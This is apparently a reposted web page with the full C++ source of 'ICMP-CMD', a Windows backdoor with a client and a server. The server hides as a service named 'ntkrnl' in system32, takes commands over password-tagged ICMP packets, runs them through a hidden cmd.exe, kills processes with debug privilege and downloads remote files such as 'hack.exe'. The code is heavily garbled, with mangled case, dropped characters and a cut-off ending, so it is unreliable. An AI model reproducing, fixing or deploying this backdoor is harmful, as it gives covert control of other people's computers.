ICMP back door program original code

xiaoxiao2021-03-06  79

//********Client.cpp**********/// #include #include #include pragma comment (lib, "ws2_32.lib) char sendmsg [256]; / * The ip header * / typedef struct iphdr {unsigned int h_len: 4; // 4 top length Unsigned int version: 4; // ip version number, 4 indicate IPv4 unsigned char TOS; // 8 service type TOS unsigned Short total_len; // 16-bit total length (bytes) unsigned short ident; // 16-bit identifier Unsigned short frag_and_flags; // 3 bits of unsigned char TTL; // 8-bit survival time TTL unsigned char proto; // 8 Bit protocol (TCP, UDP, or other) Unsigned short checksum; // 16-bit IP header checksum unsigned int source iP address unsigned int desip; // 32 bit IP address} ipHeader; typedef struct _iHDR {BYTE I_TYPE; // 8-bit type Byte i_code; // 8-bit code ushort i_cksum; // 16-bit check and ushort i_id; // identification number (generally used process number as an identification number) Ushort i_seq; // message SEQ ID ULONG timestamp; // time cut} IcmpHeader; #define STATUS_FAILED 0xFFFF #define MAX_PACKET 2000 char arg [1450]; #define xmalloc (s) HeapAlloc (GetProcessHeap (), HEAP_ZERO_MEMORY, (s)) void fill_icmp_data (char *, int); Ushort Checksum (Ushort *, int); void decode_resp (char *, int, Struct SockAddr_in *); // ICMP Unpacking Function Void Help (Void); Void Usage (CHAR * PROG); INT Main (int Argc, char * argv []) {char * icmp_dest_ip; // target host IP char * Recvbuf; if (argc! = 2) {usage (argv [0]); return 0;} ICMP_DEST_IP = Argv [1]; // Get target host IP WSAData Wsadata; Socket SockRaw; struct sockaddr_in dest, from; int Datasize; INT fromLen = SizeOf (from); char * ICMP_DATA; IF (WSAStartup (MakeWord (2, 2), & WSADATA! = 0) {Printf (stderr, "WSASTARTUP FAILED:% D / N, getLastError ()); EXITPROCESS STATUS_FAILED);} sockRaw = socket (AF_INET, SOCK_RAW, IPPROTO_ICMP); int timeout = 1000; setsockopt (sockRaw, SOL_SOCKET, SO_SNDTIMEO, (char *) & timeout, sizeof (timeout)); timeout = 4000;

setsockopt (sockRaw, SOL_SOCKET, SO_RCVTIMEO, (char *) & timeout, sizeof (timeout)); memset (& dest, 0, sizeof (dest)); dest.sin_addr.s_addr = inet_addr (ICMP_DEST_IP); dest.sin_family = AF_INET; usage (argv [0]); __TRY {for (;;) {RINTF ("ICMP-CMD>); FGETS (SendMSG, 1024, stdin); // Get the command line, save it in the sendMSG array ||! strcmp (sendMSG , "Q / N)) EXITPROCESS (0); f (! Strcmp (Sendmsg," / N)) Continue; ||! strcmp (sendmsg, "h / n)) {help (); continue;} f (! Memcmp (Sendmsg, "http: //, 7))) filename /" / n); Continue; DataSize = Strlen (sendmsg); DataSize = SizeOf (ICMPHEADER); RINTF ("ICMP Packet size is% D, Datasize); icmp_data = (char *) xmalloc (MAX_PACKET); recvbuf = (char *) xmalloc (MAX_PACKET); memset (icmp_data, 0, MAX_PACKET); fill_icmp_data (icmp_data, datasize); ((IcmpHeader *) icmp_data) -> i_cksum = 0 ; ((IcmpHeader *) icmp_data) -> i_cksum = checksum ((USHORT *) icmp_data, datasize); int bwrote = sendto (sockRaw, icmp_data, datasize, 0, (struct sockaddr *) & dest, sizeof (dest)); if (BWrote == Socket_ERROR) {f (wsagetlasterror () == wsaetimedout) Printf ("TIMED O UT / N); Printf (stderr, "sendto failed:% D / N, wsagetlasterror ());} if (BWrote Return 0;} RINTF (" / Nsend packet to% s success! / n, argv [1]) DWORD START = GetTickCount (); for (;;) {IF ((GetTickCount () - start)> = 1000 Break; Memset (Recvbuf, 0, Max_Packet); int bow = recvfrom (sock, recvbuf, max_packet, 0 , (Struct sockaddr *) & from, & fromlen; if (bread == Socket_ERROR) {if (WsagetLastError () == wsaetimedout) {RINTF ("TIMED OUT / N); Break;} Printf (stderr," RECVFROM FAILED:% D / N, wsagetlasterror ()); Break;} Decode_resp (Recvbuf, Bread, & from);

}} // end for} // end try __finally {if (sockRaw = INVALID_SOCKET!) Closesocket (sockRaw); WSACleanup ();} return 0;} USHORT checksum (USHORT * buffer, int size) {unsigned long cksum = 0 WHILE (SIZE> 1) {CKSUM = * buffer ; size- = sizeof (ushort);}} (size) {cksum = * (uchar *) buffer;} cksum = (CKSUM >> 16) (CKSUM & 0xFFFF ); cksum = (cksum >> 16); return (USHORT) (~ cksum);} void fill_icmp_data (char * icmp_data, int datasize) {IcmpHeader * icmp_hdr; char * datapart; icmp_hdr = (IcmpHeader *) icmp_data; icmp_hdr- > i_type = 0; icmp_hdr-> i_code = 0; icmp_hdr-> i_id = (USHORT) GetCurrentProcessId (); icmp_hdr-> timestamp = GetTickCount (); icmp_hdr-> i_seq = 1234; datapart = icmp_data sizeof (IcmpHeader); memcpy (DataPart, Sendmsg, Size);} void usage (char * prog) {printf ("/ t / t ===== Welcome to www.hackerxfiles.net ====== / n); Printf ("/ n); Printf (" / t / t --- [ICMP-CMD V1.0 Beta, By gxisone] --- / n); Printf ("/ T / T --- [e-mail: GXISONE@hotmail.com] --- / n); Printf ("/ t / t --- [2003/8/15] --- / n); P RINTF ("/ t / tusage:% s remoteip / n, prog); Printf (" / t / tctrl c or q /} void decode_resp (char * buf, int bytes, struct sockaddr_in * from) {memset (arg, 0, sizeof (arg)); IpHeader * iphdr; IcmpHeader * icmphdr; unsigned short iphdrlen; iphdr = (IpHeader *) buf; iphdrlen = iphdr-> h_len * 4 icmphdr = (ICMPHEADER *) (BUF iPHDRLEN); if (ICMPHDR-> i_seq == 4321) // The password is correct to output data segment {RINTF ("% D bytes from% s:, bytes, inet_ntoa (from> sin_addr)) ; RINTF ("ICMPTYPE% D, ICMPHDR-> i_TYPE); RINTF ("

ICMPCODE% D, ICMPHDR-> i_code); RINTF ("/ n); Memcpy (Arg, BUF IPHDRLEN 12, 1450); RINTF ("% s, arg);} lse printf ("Other ICMP Packets! / N );} Void help (void) {printf ("/ n); printf (" [http://127.0.0.1/hack.exe -admin.exe

] (Download Files. Parth IS System32) / N); Printf ("List the Process) / N); Printf (" [Pskill ID] / N); Printf ("Command) THE command) / n); Printf ("/ n);} /**************** Server.cpp*********** *** / #include #include #include #include include "stdafx.h pragma comment (lib," Urlmon.lib) pragma comment (lib, "ws2_32.lib) #define ICMP_PASSWORD 1234 #define STATUS_FAILED 0xFFFF #define MAX_PACKET 6500 # Define Xmalloc (s) Heapalloc (GetProcessHeap (), Heap_zero_memory, (s)) / * the ip header * / typedef struct iphdr {unsigned int h_len: 4; // 4 top length Unsigned int version: 4; // ip version No., 4 indicates IPv4 unsigned char TOS; // 8-bit service type TOS unsigned short total_len; // 16-bit total length (byte) unsigned short ident; // 16-bit identifier unsigned short frag_and_flags; // 3 bit flag bit unsigned Char ttl; // 8 Survival Time TTL Unsigned Char Proto; // 8-bit protocol (TCP, UDP, or other) Unsigned short checksum; // 16-bit IP header checksum unsigned int sourceIP; // 32 bitsource IP address Unsigned int desip; // 32 bit ip address} ipHeader; // Defines ICMP header typef struct _ihdr {byte i_type; // 8-bit type BYTE I_CODE; / / 8-bit code ushort i_cksum; // 16-bit check and ushort i_id; // identification number (generally used process number as an identification number) Ushort i_seq; // message serial number Ulong timestamp; // Timestamp} icmpheader; char Arg [256]; char buffer [2048] = {0}; // Pipe output data void decode_resp (char *, int, struct sockaddr_in *); // ICMP unpack function void fill_icmp_data (char * icmp_data); void pslist (void); BOOL killps (DWORD id); // function to kill the process void send (void); char * ICMP_DEST_IP; USHORT checksum (USHORT * buffer, int size); HANDLE hMutex ; SERVICE_STATUS ServiceStatus; SERVICE_STATUS_HANDLE ServiceStatusHandle; void WINAPI ICMP_CmdStart (DWORD, LPTSTR *); void WINAPI CmdControl (DWORD); DWORD WINAPI CmdService (LPVOID); void InstallCmdService (void);

void RemoveCmdService (void); void usage (char * par); int main (int argc, char * argv []) {ERVICE_TABLE_ENTRY DispatchTable [] = {{ "ntkrnl, ICMP_CmdStart}, {NULL, NULL}}; if (argc == 2) {if (! Stricmp (argv [1], "- install) {usage (argv [0]); installcmdservice ();} else if (! Stricmp (argv [1]," - remove)) {usage (argv [0]); RemoveCmdService ();} else usage (argv [0]); return 0;} else usage (argv [0]); StartServiceCtrlDispatcher (DispatchTable); return 0;} void WINAPI ICMP_CmdStart (DWORD dwArgc, LPTSTR * lpArgv) {HANDLE hThread; ServiceStatus.dwServiceType = SERVICE_WIN32; ServiceStatus.dwCurrentState = SERVICE_START_PENDING; ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_PAUSE_CONTINUE; ServiceStatus.dwServiceSpecificExitCode = 0; ServiceStatus.dwWin32ExitCode = 0; ServiceStatus.dwCheckPoint = 0; ServiceStatus. DWWAITHINT = 0; serviceStatusHandle = RegisterServiceCtrlHandler ("NTKRNL, CMDControl); if (ServiceStatusHandle == 0) {OutputDebugstring (" RegisterServiceCtrlHandler Error ! / N); return} ServiceStatus.dwCurrentState = SERVICE_RUNNING; ServiceStatus.dwCheckPoint = 0; ServiceStatus.dwWaitHint = 0; if (SetServiceStatus (ServiceStatusHandle, & ServiceStatus) == 0) {OutputDebugString ( "SetServiceStatus in CmdStart Error / n)!; return} hThread = CreateThread (NULL, 0, CmdService, NULL, 0, NULL); if (hThread == NULL) {OutputDebugString ( "CreateThread in CmdStart Error / n!);} return} void WINAPI CmdControl (DWORD dwCode) { Switch (dwcode) {copy service_control_pause: service: service = service_paused; break; case service_control_continue: servicesTatus.dwcurrentState = service_running;

break; case SERVICE_CONTROL_STOP: WaitForSingleObject (hMutex, INFINITE); ServiceStatus.dwCurrentState = SERVICE_STOPPED; ServiceStatus.dwWin32ExitCode = 0; ServiceStatus.dwCheckPoint = 0; ServiceStatus.dwWaitHint = 0; if (SetServiceStatus (ServiceStatusHandle, & ServiceStatus) == 0) {OutputDebugString (! "SetServiceStatus in CmdControl in Switch Error / n);} ReleaseMutex (hMutex); CloseHandle (hMutex); return case SERVICE_CONTROL_INTERROGATE: break; default: break;} if (SetServiceStatus (ServiceStatusHandle, & ServiceStatus) == 0) {OutputDebugString ( "SetServiceStatus in cmdcontrol out switch error! / N);} returnid lpparam // Here is the main function of the service, write your code here to become a service {char * icmp_data; int bow, datasize, retval; SOCKET sockRaw = (SOCKET) NULL; WSADATA wsaData; struct sockaddr_in dest, from; int fromlen = sizeof (from); int timeout = 2000; char * recvbuf; if ((retval = WSAStartup (MAKEWORD (2,1 ), & wsadata))! = 0) {Printf ("WSASTARTUP FAILED:% S / N, RETVAL); EXITPROCESS STATUS_FAILED);} sockRaw = WSASocket (AF_INET, SOCK_RAW, IPPROTO_ICMP, NULL, 0, WSA_FLAG_OVERLAPPED); if (sockRaw == INVALID_SOCKET) {printf ( "WSASocket () failed:% s / n, WSAGetLastError ()); ExitProcess (STATUS_FAILED );} __Try {bow = setsockopt (SOCKRAW, SOL_SOCKET, SO_RCVTIMEO, (CHAR *) & Timeout, SizeOf (Timeout)); if (Bread == Socket_ERROR) __LEAVE; MEMSET (& DEST, 0, SIZEOF (DEST); DEST. sin_family = AF_INET; datasize = 0; datasize = sizeof (IcmpHeader); icmp_data = (char *) xmalloc (MAX_PACKET); recvbuf = (char *) xmalloc (MAX_PACKET); if (! icmp_data) {/ fprintf (stderr, " Heapalloc Failed% D / N, getLastError ());

__leave;} MEMSET (ICMP_DATA, 0, MAX_PACKET); for (;;) {Int BWrote; BWrote = Sendto (SockRaw, ICMP_DATA, DATASIZE, 0, (Struct Sockaddr *) & Dest, Sizeof (DEST)); Bread = Recvfrom sockRaw, recvbuf, MAX_PACKET, 0, (struct sockaddr *) & from, & fromlen); if (bread == SOCKET_ERROR) {if (WSAGetLastError () == WSAETIMEDOUT) continue; __leave;} decode_resp (recvbuf, bread, & from); Sleep (200); memset (recvbuf, 0, sizeof (recvbuf));}} __finally {if (! sockRaw = INVALID_SOCKET) closesocket (sockRaw); WSACleanup ();} return 0;} void InstallCmdService (void) {SC_HANDLE schSCManager; SC_HANDLE schService; char lpCurrentPath [MAX_PATH]; char lpImagePath [MAX_PATH]; char * lpHostName; WIN32_FIND_DATA FileData; HANDLE hSearch; DWORD dwErrorCode; SERVICE_STATUS InstallServiceStatus; GetSystemDirectory (lpImagePath, MAX_PATH); strcat (lpImagePath, "// ntkrnl.exe); LPHOSTNAME = NULL; Printf ("Transmitting File ...); hSearch = FindfirstFile (LPIMAGEPATH, & FILEDATA); if (hsearch == invalid_handle_value) {GetModuleFileName (Null, L PcurrentPath, MAX_PATH); IF (CopyFile (lpCurrentPath, LPImagePath, false) == 0) {dwerrorcode = getLastError (); if (dwerrorcode == 5) {Printf ("Failure ... Access is denied! / n);} Else {Printf ("Success! / n);}} else};" already exists! / n); findclose (hsearch);} Schscmanager = OpenScManager (LPHOSTNAME , NULL, SC_MANAGER_ALL_ACCESS); if (schSCManager == NULL) {printf ( "Open Service Control Manager Database Failure / n);! return} printf (" Creating Service ....); "ntkrnl, SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS, SERVICE_AUTO_START, Service_ERROR_IGNORE, "

ntkrnl.exe, NULL, NULL, NULL, NULL, NULL); if (schService == NULL) {dwErrorCode = GetLastError (); if (dwErrorCode = ERROR_SERVICE_EXISTS) {printf ( "Failure / n);!! CloseServiceHandle (schSCManager) Return} else {printf ("already exissrs! / N); SCHSERVICE = OpenService (SchscManager," NTKRNL, Service_Start); if (SCHSERVICE == Null) {Printf ("Opening Service .... Failure! / N); CloseServiceHandle; Return}}} else}}} else}}} else {printf ("Success! / N);} Printf (" Starting Service ....); if (STARTSERVICE (Schservice, 0, Null) == 0) {dwerrorcode = getLastError (); if (dwErrorCode == ERROR_SERVICE_ALREADY_RUNNING) {printf ( "already Running / n!); CloseServiceHandle (schSCManager); CloseServiceHandle (schService); return}} else {printf (" Pending ...);} while (QueryServiceStatus ( schService, & InstallServiceStatus) = 0) {if (InstallServiceStatus.dwCurrentState == SERVICE_START_PENDING) {Sleep (100);} else {break;}}! if (InstallServiceStatus.dwCurrentState = SERVICE_RUNNING) {printf ( "Failure / n)!!; Else {Printf ("SUCC ! Ess / n);} CloseServiceHandle (schSCManager); CloseServiceHandle (schService); return} void RemoveCmdService (void) {SC_HANDLE schSCManager; SC_HANDLE schService; char lpImagePath [MAX_PATH]; char * lpHostName; WIN32_FIND_DATA FileData; SERVICE_STATUS RemoveServiceStatus; HANDLE hSearch; DWORD dwErrorCode; GetSystemDirectory (lpImagePath, MAX_PATH); strcat (lpImagePath, "// ntkrnl.exe); lpHostName = NULL; schSCManager = OpenSCManager (lpHostName, NULL, SC_MANAGER_ALL_ACCESS); if (schSCManager == NULL) {printf (" Opening SCM .........); dwerrorcode = getLastError (); if (dwerrorcode! = 5) {Printf ("

Failure! / N);} else {printf ("Failuer ... Access is Denied! / N);} return} SCHSERVICE = OpenService (SchscManager," NTKRNL, Service_all_Access); if (SCHSERVICE == null) {Printf (" Opening service .....); dwerrorcode = getLastError (); if (dwerrorcode == 1060) {Printf ("no exissrs! / N);} else {printf (" failure! / N);} ClosServiceHandle (SchscManager) ;} else {printf ( "Stopping Service ....); if (QueryServiceStatus (schService, & RemoveServiceStatus) = 0!) {if (RemoveServiceStatus.dwCurrentState == SERVICE_STOPPED) {printf (" already Stopped / n!);} else {printf ( "Pending ...); if (ControlService (schService, SERVICE_CONTROL_STOP, & RemoveServiceStatus) = 0!) {while (RemoveServiceStatus.dwCurrentState == SERVICE_STOP_PENDING) {Sleep (10); QueryServiceStatus (schService, & RemoveServiceStatus);} if ( RemoveServiceStatus.dwcurrentState == Service_stopped) {Printf ("Success! / N);} else {printf (" failure! / N);}} else {printf ("failure! / N);}}}} else {printf (" Query failure! / N);} Printf ("Removing Service .... ); IF (SCHSERVICE) == 0) {Printf ("failure! / N);} else {printf (" sucss! / N);}} closeServiceHandle; ClosESERVICEHANDE (SCHSERVICE); Printf ("Removing File .......); SLEEP (1500); hSearch = FindfirstFile (LPIMAGEPATH, & FILEDATA); if (hsearch == invalid_handle_value) {Printf ("no exissrs! / N);} else {ix (deletefile" ) == 0) {Printf ("footure! / N);} else {printf (" success! / N);} findclose (hsearch);} return} void decode_resp (char * buf, int tents, struct sockaddr_in * from ) {IpHeader * iphdr; icmpheader * ICMPHDR;

Unsigned short iphdrlen; iphdr = (ipHeader *) buf; iphdrlen = iphdr-> h_len * 4 icmphdr = (icmpheader *); if (ICMPHDR-> i_seq == ICMP_password) // The password is correct to output data segment {ICMP_DEST_IP = INET_NTOA (from-> sin_addr); // Get the source address of the ICMP package Memcpy (Arg, BUF IPHDRLEN 12, 256); f (! Memcmp (Arg, "Pskill, 6)) {Killps (Atoi (strstr Arg, "))); SIZEOF (" Process is killed!)); send ();} lse if (! Memcmp (Arg, "PSLIST, 6)) {pslist (); send ();} lse if Strcmp (arg, "remove / n)) {transovecmdservice (); sizeof (" service removed!); send (); return;} *********** HTTP download ***** ******** LSE if (! Memcmp (Arg, "http: //, 7)) {if (char * filename = strstr (arg," -)) {char URL [200]; // Save The array of URLs MEMSET (URL, 0, 200); Memcpy (URL, Arg, Int (filename-arg-1); char fname [max_path]; getSystemDirectory; filename ; strcat (fname, "//); STRCAT (FNAME, FILENAME); * strstr (fname, "/ n) = null; hResult hret = urldownloadtofile (0, URL, FNAME, 0); MEMSET (Buffer, 0, Sizeof (buffer); SIZEOF (" Download OK / N)); Else SizeOf ("Download Failure! / N)); send (); Return;} } // *************************************************** ELSE {Security_Attributes sa ; // create cmd command is used to obtain anonymous pipe output HANDLE hRead, hWrite; sa.nLength = sizeof (SECURITY_ATTRIBUTES); sa.lpSecurityDescriptor = NULL; sa.bInheritHandle = TRUE;! if (CreatePipe (& hRead, & hWrite, & sa, 0)) {printf ( "Error On CreatePipe ()); return;} STARTUPINFO si; PROCESS_INFORMATION pi; si.cb = sizeof (STARTUPINFO); GetStartupInfo (& si); si.hStdError = hWrite; si.hStdOutput = hWrite; si . WshowWindow = sw_hide; si.dwflags = startf_useshowWindow | Startf_usestdhandles; char cmdline [270];

GetSystemDirectory (cmdline, max_path 1); trcat (cmdline, "// cmd.exe / c); strcat (cmdline, arg); if (! CreateProcess (Null, Cmdline, Null, NULL, TRUE, NULL, NULL, NULL , & Si, & Pi) {Printf ("Error On CreateProcess ()); Return;} CloseHandle (HWRITE); DWORD BYTESREAD; for (;;) {if (! Readfile (Hread, Buffer, 2048, & BytesRead, null) Break; Sleep (200);} / printf ("% s, buffer); / / / / / /}} / else printf (" Other ICMP Packets! / N); //printf (Endl; Ushort Checksum (ushort * buffer, int size) {unsigned long cksum = 0; while (size> 1) {cksum = * buffer ; size - = sizeof (ushort);} if (size) {cksum = * (uchar * Buffer;} CKSUM = (CKSUM >> 16) (CKSUM & 0xFFFF); CKSUM = (CKSUM >> 16); return (~ cksum);} void Fill_icmp_data (char * icmp_data) {icmpheader * icmp_hdr ; char * datapart; icmp_hdr = (IcmpHeader *) icmp_data; icmp_hdr-> i_type = 0; icmp_hdr-> i_code = 0; icmp_hdr-> i_id = (USHORT) GetCurrentProcessId (); icmp_hdr-> i_cksum = 0; icmp_hdr-> i_seq = 4321; ICMP_HDR-> TimeStamp = Gettickco UND (); // Setting timestamp DataPart = ICMP_DATA SIZEOF (ICMPHEADER); Memcpart, Buffer, Strlen (Buffer); // for (int i = 0; i} void usage (char * par) {printf ("/ t / t ===== Welcome to www.hackerxfiles.net ======= / n); Printf (" / n); printf ("/ t / t --- [ICMP-CMD V1 .0 beta, by gxisone] --- / n); Printf ("/ t / t --- [e-mail: gxisone@hotmail.com] --- / n); printf (" / t / t- - [2003/8/15] --- / N); Printf ("/ n); Printf (" / T / Tusage:% s -install (to install service) / n, par); printf ("/ T / T% s -remove (to remove service) / n, par); printf ("/ n);

return} void send (void) {WSADATA wsaData; SOCKET sockRaw = (SOCKET) NULL; struct sockaddr_in dest; int bread, datasize, retval, bwrote; int timeout = 1000; char * icmp_data; if ((retval = WSAStartup (MAKEWORD ( 2,1), & wsaData)) = 0) ExitProcess (STATUS_FAILED);! if ((sockRaw = WSASocket (AF_INET, SOCK_RAW, IPPROTO_ICMP, NULL, 0, WSA_FLAG_OVERLAPPED)) == INVALID_SOCKET) ExitProcess (STATUS_FAILED); __try {if ( (Bread = setsockopt (SockRaw, SOL_SOCKET, SO_SNDTIMEO, (CHAR *) & TIMEOUT, SIMEOF (TIMEOUT))) == SOCKET_ERROR) __LEVE; / / Settings Send Timeout Memset (& DEST, 0, SIZEOF (DEST)); dest.sin_family = AF_INET; dest.sin_addr.s_addr = inet_addr (ICMP_DEST_IP); datasize = strlen (buffer); datasize = sizeof (IcmpHeader); icmp_data = (char *) xmalloc (MAX_PACKET); if (icmp_data!) __leave; memset (icmp_data, 0 , MAX_PACKET); fill_icmp_data (icmp_data); // filled ICMP packets ((IcmpHeader *) icmp_data) -> i_cksum = checksum ((USHORT *) icmp_data, datasize); // calculate the checksum bwrote = sendto (sockRaw, icmp_data , DataSize, 0, (Struct SockAddr *) & Dest, SizeOf (DEST)); // Send Packet IF (BWrote == SOCKET_ERROR) {/ if (WsagetLastError () == wsaetimedout) Printf ("TIMED OUT / N); / Printf (" Sendto Failed: <__leave;} / printf ("Send Packet TO% s Success! / N << } __finally {if (sockRaw = INVALID_SOCKET!) closesocket (sockRaw); WSACleanup ();} memset (buffer, 0, sizeof (buffer)); Sleep (200);} void pslist (void) {HANDLE hProcessSnap = NULL; PROCESSENTRY32 pe32 = {0}; hProcessSnap = CreateToolhelp32Snapshot (TH32CS_SNAPPROCESS, 0); if (hProcessSnap == (HANDLE) -1) {rintf ( "/ nCreateToolhelp32Snapshot () failed:% d, GetLastError ()); return} pe32.dwSize = SIZEOF (Processentry32);

RINTF ("/ nprocessname processid; if (Process32First (HProcessSnap, & PE32)) {strat [5]; do {strat (buffer, pe32.szexefile); trcat (buffer," / t / t); ITOA (PE32. Th32Processid, A, 10); strcat (buffer, a); trcat (buffer, "/ n); /printf ("/n%-20s%d ,pe32.szexefile ,pe32.th32processid);} while (Process32Next (HProcessSnap , & pe32));} else {rintf ( "/ nProcess32Firstt () failed:% d, GetLastError ());} CloseHandle (hProcessSnap); return;} BOOL SetPrivilege (HANDLE hToken, LPCTSTR lpszPrivilege, BOOL bEnablePrivilege) // tips permissions {TOKEN_PRIVILEGES tp; LUID luid; if {rintf ( "/ nLookupPrivilegevalue error:% d, GetLastError ()) (LookupPrivilegevalue (NULL, lpszPrivilege, & luid)!); return FALSE;} tp.PrivilegeCount = 1; tp.Privileges [0 ] .Luid = luid; if (bEnablePrivilege) tp.Privileges [0] .Attributes = SE_PRIVILEGE_ENABLED; else tp.Privileges [0] .Attributes = 0;. // Enable the privilege or disable all privileges AdjustTokenPrivileges (hToken, FALSE, & tp , Sizeof (token_privileges), (ptoken_privileges) NULL, (PDWORD) NULL); // Call GetLastError to determine whether the function succeeded if (GetLastError () = ERROR_SUCCESS) {rintf ( "AdjustTokenPrivileges failed:% u / n, GetLastError ()); return FALSE;}.! Return TRUE;} BOOL killps (DWORD id) // scrapping process function {HANDLE hProcess = NULL, hProcessToken = NULL; BOOL IsKilled = FALSE, bRet = FALSE; __try {if {rintf ( "/ nOpen (OpenProcessToken (GetCurrentProcess (), TOKEN_ALL_ACCESS, & hProcessToken)!) Current Process Token failed:% d, GetLastError ()); __leave;} / printf ( "/ nOpen Current Process Token ok); if (SetPrivilege (hProcessToken, SE_DEBUG_NAME, TRUE!!)) {__leave;} rintf (" / nSetPrivilege OK!); if ((hprocess =

转载请注明原文地址:https://www.9cbs.com/read-121588.html

New Post(0)